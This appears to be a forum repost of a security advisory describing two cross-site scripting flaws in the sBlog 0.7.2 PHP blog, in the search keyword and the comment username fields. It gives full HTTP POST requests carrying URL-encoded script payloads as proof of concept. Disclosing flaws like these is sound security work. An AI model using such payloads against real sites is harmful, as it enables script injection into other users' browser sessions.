Kiki |
Regular user |
|
|
Joined: Nov 13, 2005 |
Posts: 7 |
Location: Italy |
|
|
|
|
|
|
Code: |
sBlog 0.7.2 <== Multiple Cross-Site Scripting Vulnerability
===================================
Information of Software:
Software: sBlog 0.7.2
Site: http://servous.se/
Description: sBlog is a simple and new PHP Blog. Is very very simple
and it's use by newbie of PHP.
===================================
Bug:
1) Cross-Site Scripting Vulnearbility in the page search.php
sBlog contains a flaw that allows a remote cross site scripting attack.
The vulnerability is found in search method and the user can modify
the function GET and insert the XSS code
- HTTP Normal POST Request
http://[target]/[patch]/search.php
POST /[patch]/search.php HTTP/1.1
Host: [target]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.12) Gecko/20050919 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/
plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it,it-it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://[target]/[patch]/search.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
keyword=casa
- End of Normal POST Request
but we can modify the request POST in this way:
[....]
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
keyword=%3Cscript%3Ealert%28%22lol%22%29%3B%3C%2Fscript%3E
[....]
---------------------------------------------------------
PoC for the first vulnerability:
you can insert in the search textbox the key <script>alert("lol");</script> for
execute an XSS attack.
###########################################
2) Cross-Site Scripting Vulnearbility in the name of user post comment
With this vulnerability can be exploited by malicious people to conduct
script insertion attacks.
Input passed to the "title" field when editing submitted articles and
reportedly also when commenting on articles isn't properly sanitised
before being used. This can be
exploited to inject arbitrary HTML and script code, which will be executed in
a user's browser session in context of an affected site when the malicious user
data is viewed.
- HTTP Normal POST Request
http://[target]/[patch]/comments_do.php
POST [patch]/comments_do.php HTTP/1.1
Host: [target]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.12) Gecko/20050919 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=
0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it,it-it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://[target]/[patch]/comments.php?id=news_id
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
blog_id=id_of_news&username=Test&email=&homepage=&comment
=Test
but we can modify the variable &username in the request POST in this way:
[....]
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
blog_id=3&username=%3Cscript%3Ealert%28%22XSS%22%29%3B
%3C%2Fscript%3E&email=&homepage=&comment=test
[....]
---------------------------------------------------------
PoC for the second vulnerability:
you can insert in the name textbox of user comment an XSS code for
execute an cross-site scripting attack, or an HTML code
===================================
Credit:
Author: Kiki
e-mail: federico.sana@alice.it
web page: http://kiki91.altervista.org and http://blackzero.netsons.org
===================================
|
Original advisory: http://kiki91.altervista.org/exploit/sBlog_0.72_xss.txt |
|